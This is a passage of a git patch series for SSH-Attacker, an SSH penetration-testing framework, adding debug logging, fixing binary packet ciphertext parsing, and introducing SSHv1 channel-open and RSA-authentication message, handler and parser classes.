.setLanguagesServerToClient( - chooser.getServerSupportedLanguagesServerToClient() - .toArray(new String[0]), - true); - getObject() - .setFirstKeyExchangePacketFollows( - chooser.getServerFirstKeyExchangePacketFollows()); - getObject().setReserved(chooser.getServerReserved()); - - chooser.getContext() - .getSshContext() - .getExchangeHashInputHolder() - .setServerKeyExchangeInit(getObject()); - } - }*/ - public void prepareMessageSpecificContents() { SshContext sshContext = chooser.getContext().getSshContext(); if (sshContext.isClient()) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/DynamicKeyExchangeAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/DynamicKeyExchangeAction.java index 0d9ab8d0b..0cad6b786 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/DynamicKeyExchangeAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/DynamicKeyExchangeAction.java @@ -50,7 +50,14 @@ public void execute(State state) throws WorkflowExecutionException { sshActions = WorkflowConfigurationFactory.createKeyExchangeActions( keyExchangeAlgorithm.getFlowType(), context.getConnection()); - sshActions.forEach(sshAction -> sshAction.execute(state)); + // sshActions.forEach(sshAction -> sshAction.execute(state)); + LOGGER.info("All Actions: {}", sshActions.toString()); + + sshActions.forEach( + (SshAction sshAction) -> { + sshAction.execute(state); + LOGGER.info("This Action: {}", sshActions.toString()); + }); } @Override From ac6f8fb1a224058f6cb57b559352ec2c10b8dca7 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Wed, 28 Feb 2024 23:03:42 +0100 Subject: [PATCH 144/176] fix BinaryPacketParser for blockcipher --- .../core/packet/parser/BinaryPacketParser.java | 16 +++++++++++++++- 1 file changed, 15 insertions(+), 1 deletion(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParser.java index 8c42bbe0d..e779d115b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParser.java @@ -194,10 +194,24 @@ private void parseEAMPacket(BinaryPacket binaryPacket) throws CryptoException { Arrays.copyOfRange( firstBlock, 0, BinaryPacketConstants.LENGTH_FIELD_LENGTH))); + LOGGER.debug( + "Ciphertext Size: {}, first block: {}", + binaryPacket.getLength().getValue(), + blockSize); + binaryPacket.setCiphertext( Bytes.concat( firstBlockEncrypted, - parseByteArrayField(binaryPacket.getLength().getValue()))); + parseByteArrayField( + binaryPacket.getLength().getValue() + - (firstBlockEncrypted.length + - BinaryPacketConstants.LENGTH_FIELD_LENGTH)))); + + LOGGER.debug( + "Ciphertext is: {} in lenght {}", + ArrayConverter.bytesToRawHexString(binaryPacket.getCiphertext().getValue()), + binaryPacket.getCiphertext().getValue().length); + LOGGER.debug("Mac Size: {}", activeDecryptCipher.getMacAlgorithm().getOutputSize()); binaryPacket.setMac( parseByteArrayField(activeDecryptCipher.getMacAlgorithm().getOutputSize())); From 66208ed112b2b6b973d91343615bc72dcd100a67 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Thu, 29 Feb 2024 00:15:45 +0100 Subject: [PATCH 145/176] fix getRecivedPackets --- .../sshattacker/core/workflow/WorkflowTraceUtil.java | 1 + .../core/workflow/action/DynamicKeyExchangeAction.java | 5 ++++- .../core/workflow/action/ReceiveAction.java | 10 ++++++++++ 3 files changed, 15 insertions(+), 1 deletion(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowTraceUtil.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowTraceUtil.java index 7416cea74..93bb0506f 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowTraceUtil.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowTraceUtil.java @@ -29,6 +29,7 @@ public static List getAllReceivedPackets(WorkflowTrace trace) { public static List getAllReceivedPackets( WorkflowTrace trace, Class packetClass) { + //noinspection unchecked return trace.getReceivingActions().stream() .flatMap(action -> action.getReceivedPackets().stream()) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/DynamicKeyExchangeAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/DynamicKeyExchangeAction.java index 0cad6b786..265293617 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/DynamicKeyExchangeAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/DynamicKeyExchangeAction.java @@ -70,7 +70,10 @@ public List> getReceivedMessages() { @Override public List getReceivedPackets() { - return null; + return sshActions.stream() + .filter(sshAction -> sshAction instanceof ReceivingAction) + .flatMap(sshAction -> ((ReceivingAction) sshAction).getReceivedPackets().stream()) + .collect(Collectors.toList()); } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java index f8dcb4385..3d55b218f 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java @@ -12,6 +12,7 @@ import de.rub.nds.sshattacker.core.exceptions.WorkflowExecutionException; import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.packet.AbstractPacket; +import de.rub.nds.sshattacker.core.packet.BinaryPacket; import de.rub.nds.sshattacker.core.protocol.authentication.message.*; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; import de.rub.nds.sshattacker.core.protocol.connection.message.*; @@ -263,6 +264,15 @@ public void execute(State state) throws WorkflowExecutionException { receivedPackets = packets; + LOGGER.info("Containt {} packets!", packets.size()); + if (!packets.isEmpty()) { + for (AbstractPacket packet : packets) { + if (packet instanceof BinaryPacket) { + LOGGER.info("Padding of packet is {}", ((BinaryPacket) packet).getPadding()); + } + } + } + /*LOGGER.debug("Receiving messages for connection alias '{}'...", getConnectionAlias()); MessageActionResult result = receiveMessageHelper.receiveMessages(context, expectedMessages); From e17874aa16d3402c0c9fc72e1af6dec1fa9cb009 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Thu, 29 Feb 2024 01:10:22 +0100 Subject: [PATCH 146/176] adding new packets --- ...elOpenConfirmationMessageSSHV1Handler.java | 28 +++++++ ...ChannelOpenFailureMessageSSHV1Handler.java | 28 +++++++ .../RsaAuthChallengeMessageSSHV1Handler.java | 30 +++++++ .../handler/RsaAuthMessageSSHV1Handler.java | 30 +++++++ .../ChannelOpenConfirmationMessageSSH1.java | 80 ++++++++++++++++++ .../ChannelOpenFailureMessageSSH1.java | 67 +++++++++++++++ .../message/RsaAuthChallengeMessageSSH1.java | 78 ++++++++++++++++++ .../ssh1/message/RsaAuthMessageSSH1.java | 82 +++++++++++++++++++ ...nelOpenConfirmationMessageSSHV1Parser.java | 41 ++++++++++ .../ChannelOpenFailureMessageSSHV1Parser.java | 40 +++++++++ .../RsaAuthChallengeMessageSSHV1Parser.java | 44 ++++++++++ .../parser/RsaAuthMessageSSHV1Parser.java | 50 +++++++++++ ...penConfirmationMessageSSHV1Preparator.java | 35 ++++++++ ...nnelOpenFailureMessageSSHV1Preparator.java | 34 ++++++++ ...saAuthMessageChallengeSSHV1Preparator.java | 30 +++++++ .../RsaAuthMessageSSHV1Preparator.java | 30 +++++++ ...enConfirmationMessageSSHV1Serializier.java | 36 ++++++++ ...nelOpenFailureMessageSSHV1Serializier.java | 34 ++++++++ ...aAuthChallengeMessageSSHV1Serializier.java | 26 ++++++ .../RsaAuthMessageSSHV1Serializier.java | 26 ++++++ 20 files changed, 849 insertions(+) create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ChannelOpenConfirmationMessageSSHV1Handler.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ChannelOpenFailureMessageSSHV1Handler.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/RsaAuthChallengeMessageSSHV1Handler.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/RsaAuthMessageSSHV1Handler.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ChannelOpenConfirmationMessageSSH1.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ChannelOpenFailureMessageSSH1.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/RsaAuthChallengeMessageSSH1.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/RsaAuthMessageSSH1.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ChannelOpenConfirmationMessageSSHV1Parser.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ChannelOpenFailureMessageSSHV1Parser.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/RsaAuthChallengeMessageSSHV1Parser.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/RsaAuthMessageSSHV1Parser.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ChannelOpenConfirmationMessageSSHV1Preparator.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ChannelOpenFailureMessageSSHV1Preparator.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/RsaAuthMessageChallengeSSHV1Preparator.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/RsaAuthMessageSSHV1Preparator.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ChannelOpenConfirmationMessageSSHV1Serializier.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ChannelOpenFailureMessageSSHV1Serializier.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/RsaAuthChallengeMessageSSHV1Serializier.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/RsaAuthMessageSSHV1Serializier.java diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ChannelOpenConfirmationMessageSSHV1Handler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ChannelOpenConfirmationMessageSSHV1Handler.java new file mode 100644 index 000000000..13e1bfe09 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ChannelOpenConfirmationMessageSSHV1Handler.java @@ -0,0 +1,28 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.handler; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelOpenConfirmationMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class ChannelOpenConfirmationMessageSSHV1Handler extends SshMessageHandler { + + private static final Logger LOGGER = LogManager.getLogger(); + + public ChannelOpenConfirmationMessageSSHV1Handler(SshContext context) { + super(context); + } + + @Override + public void adjustContext(ChannelOpenConfirmationMessageSSH1 message) { + LOGGER.warn("Recieved Channel Open Confirmation with remote Channel {} and local Channel", message.getRemoteChannel().getValue()); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ChannelOpenFailureMessageSSHV1Handler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ChannelOpenFailureMessageSSHV1Handler.java new file mode 100644 index 000000000..1c5387992 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ChannelOpenFailureMessageSSHV1Handler.java @@ -0,0 +1,28 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.handler; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelOpenFailureMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class ChannelOpenFailureMessageSSHV1Handler extends SshMessageHandler { + + private static final Logger LOGGER = LogManager.getLogger(); + + public ChannelOpenFailureMessageSSHV1Handler(SshContext context) { + super(context); + } + + @Override + public void adjustContext(ChannelOpenFailureMessageSSH1 message) { + LOGGER.warn("Recieved channel open failure for channel{}", message.getRemoteChannel().getValue()); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/RsaAuthChallengeMessageSSHV1Handler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/RsaAuthChallengeMessageSSHV1Handler.java new file mode 100644 index 000000000..0a6c02126 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/RsaAuthChallengeMessageSSHV1Handler.java @@ -0,0 +1,30 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.handler; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.RsaAuthChallengeMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.RsaAuthMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class RsaAuthChallengeMessageSSHV1Handler extends SshMessageHandler { + + private static final Logger LOGGER = LogManager.getLogger(); + + public RsaAuthChallengeMessageSSHV1Handler(SshContext context) { + super(context); + } + + + @Override + public void adjustContext(RsaAuthChallengeMessageSSH1 message) { + LOGGER.info("Recived a RSA Auth Message"); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/RsaAuthMessageSSHV1Handler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/RsaAuthMessageSSHV1Handler.java new file mode 100644 index 000000000..7810637d0 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/RsaAuthMessageSSHV1Handler.java @@ -0,0 +1,30 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.handler; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.EofMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.RsaAuthMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class RsaAuthMessageSSHV1Handler extends SshMessageHandler { + + private static final Logger LOGGER = LogManager.getLogger(); + + public RsaAuthMessageSSHV1Handler(SshContext context) { + super(context); + } + + + @Override + public void adjustContext(RsaAuthMessageSSH1 message) { + LOGGER.info("Recived a RSA Auth Message"); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ChannelOpenConfirmationMessageSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ChannelOpenConfirmationMessageSSH1.java new file mode 100644 index 000000000..fcc4038f0 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ChannelOpenConfirmationMessageSSH1.java @@ -0,0 +1,80 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.message; + +import de.rub.nds.modifiablevariable.ModifiableVariableFactory; +import de.rub.nds.modifiablevariable.integer.ModifiableInteger; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessage; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.handler.ChannelOpenConfirmationMessageSSHV1Handler; +import de.rub.nds.sshattacker.core.protocol.ssh1.parser.ChannelOpenConfirmationMessageSSHV1Parser; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.ChannelOpenConfirmationMessageSSHV1Preparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.ExitStatusMessageSSHV1Preparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.ChannelOpenConfirmationMessageSSHV1Serializier; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.ExitStatusMessageSSHV1Serializier; + +import java.io.InputStream; + +public class ChannelOpenConfirmationMessageSSH1 extends SshMessage { + + private ModifiableInteger localChannel; + private ModifiableInteger remoteChannel; + + public ModifiableInteger getLocalChannel() { + return localChannel; + } + + public void setLocalChannel(ModifiableInteger localChannel) { + this.localChannel = localChannel; + } + + public void setLocalChannel(int localChannel) { + this.localChannel = ModifiableVariableFactory.safelySetValue(this.localChannel, localChannel); + } + + public ModifiableInteger getRemoteChannel() { + return remoteChannel; + } + + public void setRemoteChannel(ModifiableInteger remoteChannel) { + this.remoteChannel = remoteChannel; + } + + public void setRemoteChannel(int remoteChannel) { + this.remoteChannel = ModifiableVariableFactory.safelySetValue(this.remoteChannel, remoteChannel); + } + + @Override + public ChannelOpenConfirmationMessageSSHV1Handler getHandler(SshContext context) { + return new ChannelOpenConfirmationMessageSSHV1Handler(context); + } + + @Override + public SshMessageParser getParser( + SshContext context, InputStream stream) { + return new ChannelOpenConfirmationMessageSSHV1Parser(context, stream); + } + + @Override + public SshMessagePreparator getPreparator(SshContext context) { + return new ChannelOpenConfirmationMessageSSHV1Preparator(context.getChooser(), this); + } + + @Override + public SshMessageSerializer getSerializer(SshContext context) { + return new ChannelOpenConfirmationMessageSSHV1Serializier(this); + } + + @Override + public String toShortString() { + return "SSH_MSG_CHANNEL_OPEN_CONFIRMATION"; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ChannelOpenFailureMessageSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ChannelOpenFailureMessageSSH1.java new file mode 100644 index 000000000..298261c0a --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ChannelOpenFailureMessageSSH1.java @@ -0,0 +1,67 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.message; + +import de.rub.nds.modifiablevariable.ModifiableVariableFactory; +import de.rub.nds.modifiablevariable.integer.ModifiableInteger; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessage; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.handler.ChannelOpenFailureMessageSSHV1Handler; +import de.rub.nds.sshattacker.core.protocol.ssh1.parser.ChannelOpenFailureMessageSSHV1Parser; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.ChannelOpenFailureMessageSSHV1Preparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.ExitStatusMessageSSHV1Preparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.ChannelOpenFailureMessageSSHV1Serializier; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.ExitStatusMessageSSHV1Serializier; + +import java.io.InputStream; + +public class ChannelOpenFailureMessageSSH1 extends SshMessage { + + private ModifiableInteger remoteChannel; + + public ModifiableInteger getRemoteChannel() { + return remoteChannel; + } + + public void setRemoteChannel(ModifiableInteger remoteChannel) { + this.remoteChannel = remoteChannel; + } + + public void setRemoteChannel(int remoteChannel) { + this.remoteChannel = ModifiableVariableFactory.safelySetValue(this.remoteChannel, remoteChannel); + } + + @Override + public ChannelOpenFailureMessageSSHV1Handler getHandler(SshContext context) { + return new ChannelOpenFailureMessageSSHV1Handler(context); + } + + @Override + public SshMessageParser getParser( + SshContext context, InputStream stream) { + return new ChannelOpenFailureMessageSSHV1Parser(context, stream); + } + + @Override + public SshMessagePreparator getPreparator(SshContext context) { + return new ChannelOpenFailureMessageSSHV1Preparator(context.getChooser(), this); + } + + @Override + public SshMessageSerializer getSerializer(SshContext context) { + return new ChannelOpenFailureMessageSSHV1Serializier(this); + } + + @Override + public String toShortString() { + return "SSH_MSG_CHANNEL_OPEN_FAILURE"; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/RsaAuthChallengeMessageSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/RsaAuthChallengeMessageSSH1.java new file mode 100644 index 000000000..52d331d09 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/RsaAuthChallengeMessageSSH1.java @@ -0,0 +1,78 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.message; + +import de.rub.nds.modifiablevariable.ModifiableVariableFactory; +import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray; +import de.rub.nds.modifiablevariable.integer.ModifiableInteger; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessage; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.handler.RsaAuthChallengeMessageSSHV1Handler; +import de.rub.nds.sshattacker.core.protocol.ssh1.parser.RsaAuthChallengeMessageSSHV1Parser; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.RsaAuthMessageChallengeSSHV1Preparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.RsaAuthChallengeMessageSSHV1Serializier; + +import java.io.InputStream; + +public class RsaAuthChallengeMessageSSH1 extends SshMessage { + + private ModifiableByteArray encryptedChallenge; + private ModifiableInteger encryptedChallengeBitLenght; + + public ModifiableInteger getEncryptedChallengeBitLenght() { + return encryptedChallengeBitLenght; + } + + public void setEncryptedChallengeBitLenght(ModifiableInteger encryptedChallengeBitLenght) { + this.encryptedChallengeBitLenght = encryptedChallengeBitLenght; + } + + public void setEncryptedChallengeBitLenght(int identityPublicModulusBitLenght) { + this.encryptedChallengeBitLenght = ModifiableVariableFactory.safelySetValue(this.encryptedChallengeBitLenght,identityPublicModulusBitLenght); + } + + public ModifiableByteArray getEncryptedChallenge() { + return encryptedChallenge; + } + + public void setEncryptedChallenge(ModifiableByteArray encryptedChallenge) { + this.encryptedChallenge = encryptedChallenge; + } + + public void setIdentityPublicModulus(byte[] identityPublicModulus) { + this.encryptedChallenge = ModifiableVariableFactory.safelySetValue(this.encryptedChallenge,identityPublicModulus); + } + + @Override + public RsaAuthChallengeMessageSSHV1Handler getHandler(SshContext context) { + return new RsaAuthChallengeMessageSSHV1Handler(context); + } + + @Override + public SshMessageParser getParser(SshContext context, InputStream stream) { + return new RsaAuthChallengeMessageSSHV1Parser(context, stream); + } + + @Override + public SshMessagePreparator getPreparator(SshContext context) { + return new RsaAuthMessageChallengeSSHV1Preparator(context.getChooser(), this); + } + + @Override + public SshMessageSerializer getSerializer(SshContext context) { + return new RsaAuthChallengeMessageSSHV1Serializier(this); + } + + @Override + public String toShortString() { + return "SSH_CMSG_AUTH_RSA_CHALLENGE"; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/RsaAuthMessageSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/RsaAuthMessageSSH1.java new file mode 100644 index 000000000..90c6b5c89 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/RsaAuthMessageSSH1.java @@ -0,0 +1,82 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.message; + +import de.rub.nds.modifiablevariable.ModifiableVariableFactory; +import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray; +import de.rub.nds.modifiablevariable.integer.ModifiableInteger; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessage; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.handler.EofMessageSSHV1Handler; +import de.rub.nds.sshattacker.core.protocol.ssh1.handler.RsaAuthMessageSSHV1Handler; +import de.rub.nds.sshattacker.core.protocol.ssh1.parser.EofMessageSSHV1Parser; +import de.rub.nds.sshattacker.core.protocol.ssh1.parser.RsaAuthMessageSSHV1Parser; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.EofMessageSSHV1Preparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.RsaAuthMessageSSHV1Preparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.EofMessageSSHV1Serializier; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.RsaAuthMessageSSHV1Serializier; + +import java.io.InputStream; + +public class RsaAuthMessageSSH1 extends SshMessage { + + private ModifiableByteArray identityPublicModulus; + private ModifiableInteger identityPublicModulusBitLenght; + + public ModifiableInteger getIdentityPublicModulusBitLenght() { + return identityPublicModulusBitLenght; + } + + public void setIdentityPublicModulusBitLenght(ModifiableInteger identityPublicModulusBitLenght) { + this.identityPublicModulusBitLenght = identityPublicModulusBitLenght; + } + + public void setIdentityPublicModulusBitLenght(int identityPublicModulusBitLenght) { + this.identityPublicModulusBitLenght = ModifiableVariableFactory.safelySetValue(this.identityPublicModulusBitLenght,identityPublicModulusBitLenght); + } + + public ModifiableByteArray getIdentityPublicModulus() { + return identityPublicModulus; + } + + public void setIdentityPublicModulus(ModifiableByteArray identityPublicModulus) { + this.identityPublicModulus = identityPublicModulus; + } + + public void setIdentityPublicModulus(byte[] identityPublicModulus) { + this.identityPublicModulus = ModifiableVariableFactory.safelySetValue(this.identityPublicModulus,identityPublicModulus); + } + + @Override + public RsaAuthMessageSSHV1Handler getHandler(SshContext context) { + return new RsaAuthMessageSSHV1Handler(context); + } + + @Override + public SshMessageParser getParser(SshContext context, InputStream stream) { + return new RsaAuthMessageSSHV1Parser(context, stream); + } + + @Override + public SshMessagePreparator getPreparator(SshContext context) { + return new RsaAuthMessageSSHV1Preparator(context.getChooser(), this); + } + + @Override + public SshMessageSerializer getSerializer(SshContext context) { + return new RsaAuthMessageSSHV1Serializier(this); + } + + @Override + public String toShortString() { + return "SSH_CMSG_AUTH_RSA"; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ChannelOpenConfirmationMessageSSHV1Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ChannelOpenConfirmationMessageSSHV1Parser.java new file mode 100644 index 000000000..cddec7595 --- /dev/null +++ 